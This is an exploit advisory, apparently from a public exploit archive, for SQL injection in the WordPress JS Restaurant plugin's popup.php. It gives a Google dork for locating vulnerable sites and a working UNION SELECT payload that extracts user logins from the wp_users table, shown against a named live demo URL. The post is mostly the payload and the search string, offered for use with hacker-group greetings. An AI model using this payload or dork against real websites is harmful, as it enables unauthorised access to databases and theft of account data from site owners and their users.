WordPress JS Restaurant SQL Injection

2013.07.09
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:/wp-content/plugins/js-restaurant/popup.php?restuarant_id=

######################################################################### # Exploit Title : Wordpress JS Restaurant Plugin SQL Injection Vulnerability # # Author : Ashiyane Digital Security Team # # Security Risk : HIgh # # Google Dork : inurl:/wp-content/plugins/js-restaurant/popup.php?restuarant_id= # ############## # Location:site/[path]/wp-content/plugins/js-restaurant/popup.php?restuarant_id=[SQLi] # # DEm0: # #http://smartsocialmedia.fr/demo/restaurant/wp-content/plugins/js-restaurant/popup.php #?restuarant_id=-2%20UNION%20SELECT%201,group_concat%28user_login%29,3,4,5,6,7,8,9,10, #11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20wp_users--+ # ############## # Special Tnx : Reza-S4T4n , C4t , Angel-D3m0n , Alireza666 ,... ############## # # Greetz to: My Lord ALLAH # ############## # # bY T3rm!nat0r5 # ##########################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top